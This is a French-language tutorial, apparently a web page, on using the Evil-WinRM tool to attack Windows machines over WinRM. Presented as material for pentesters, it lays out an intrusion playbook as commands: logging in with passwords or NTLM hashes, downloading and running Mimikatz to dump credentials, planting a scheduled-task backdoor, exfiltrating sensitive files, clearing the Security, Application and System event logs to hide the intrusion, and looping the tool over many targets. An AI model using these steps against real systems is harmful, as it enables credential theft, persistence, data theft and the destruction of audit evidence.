đŸ”„ Evil-WinRM - Guide Complet et Fonctionnel

Evil-WinRM est un outil dĂ©diĂ© aux pentesters et Ă©quipes Red Team pour exploiter Windows Remote Management (WinRM). Ce tutoriel couvre l’installation, l’exploitation, et des scĂ©narios pratiques pour maximiser vos campagnes de post-exploitation. 🚀

1ïžâƒŁ PrĂ©-requis

2ïžâƒŁ Installation d'Evil-WinRM

Étape 1 : TĂ©lĂ©charger Evil-WinRM

Clonez le dépÎt GitHub officiel :

git clone https://github.com/Hackplayers/evil-winrm.git

Accédez au répertoire :

cd evil-winrm

Étape 2 : Installer les DĂ©pendances

Installez Ruby et les bibliothÚques nécessaires :


sudo apt update
sudo apt install ruby -y
gem install bundler
bundle install
            

Étape 3 : VĂ©rifier l’Installation

Testez l’outil pour confirmer qu’il fonctionne :

ruby evil-winrm.rb --help

Vous devriez voir une liste des options disponibles.

3ïžâƒŁ Configuration et PrĂ©paration

Vérification des Ports WinRM

Par défaut, WinRM utilise les ports suivants :

Vérifiez si ces ports sont ouverts sur la cible :

nmap -p 5985,5986 

WinRM Activé sur la Cible

Confirmez que WinRM est activé avec les commandes suivantes sur la cible (si vous y avez accÚs) :


winrm quickconfig
Get-Service -Name WinRM
            

Le service doit ĂȘtre en Ă©tat "Running".

4ïžâƒŁ Utilisation d'Evil-WinRM

Connexion Basique

Utilisez Evil-WinRM pour vous connecter Ă  une cible avec des identifiants valides :


ruby evil-winrm.rb -i  -u  -p 
            

Connexion avec Hash

Si vous disposez d’un NTLM hash, utilisez l’option suivante :


ruby evil-winrm.rb -i  -u  -H 
            

Options Supplémentaires

Evil-WinRM propose plusieurs options pour personnaliser la connexion :

5ïžâƒŁ Commandes Post-Exploitation

Exécuter des Commandes

Depuis une session Evil-WinRM, vous pouvez exécuter des commandes PowerShell :


whoami
Get-Process
Get-NetIPAddress
            

Transfert de Fichiers

Chargez ou téléchargez des fichiers entre votre machine et la cible :

Exécution de Scripts

Chargez et exécutez un script PowerShell local sur la cible :


ruby evil-winrm.rb -i  -u  -p  -e script.ps1
            

6ïžâƒŁ ScĂ©narios Pratiques

Scénario 1 : Enumeration Basique

Listez les utilisateurs et groupes locaux sur la cible :


Get-LocalUser
Get-LocalGroupMember -Group Administrators
            

Scénario 2 : Dump de Mots de Passe

Utilisez Mimikatz pour extraire les mots de passe en mémoire :


Invoke-WebRequest -Uri  -OutFile C:\temp\mimikatz.exe
C:\temp\mimikatz.exe
            

Scénario 3 : Persistance

Ajoutez une tùche planifiée pour exécuter un script malveillant :


schtasks /create /sc daily /tn "Backdoor" /tr "C:\backdoor.ps1" /st 09:00
            

Scénario 4 : Exfiltration des Données

TransfĂ©rez des fichiers sensibles vers une machine d’attaque :


download C:\sensitive_data\*.txt /path/to/local/machine
            

Scénario 5 : Suppression des Logs

Effacez les traces de votre intrusion :


wevtutil cl Security
wevtutil cl Application
wevtutil cl System
            

7ïžâƒŁ IntĂ©gration et Automatisation

Automatisation des TĂąches

Utilisez des scripts Bash pour exécuter Evil-WinRM avec plusieurs cibles :


#!/bin/bash
for ip in $(cat targets.txt); do
  ruby evil-winrm.rb -i $ip -u admin -p password
done
            

8ïžâƒŁ Conseils et Bonnes Pratiques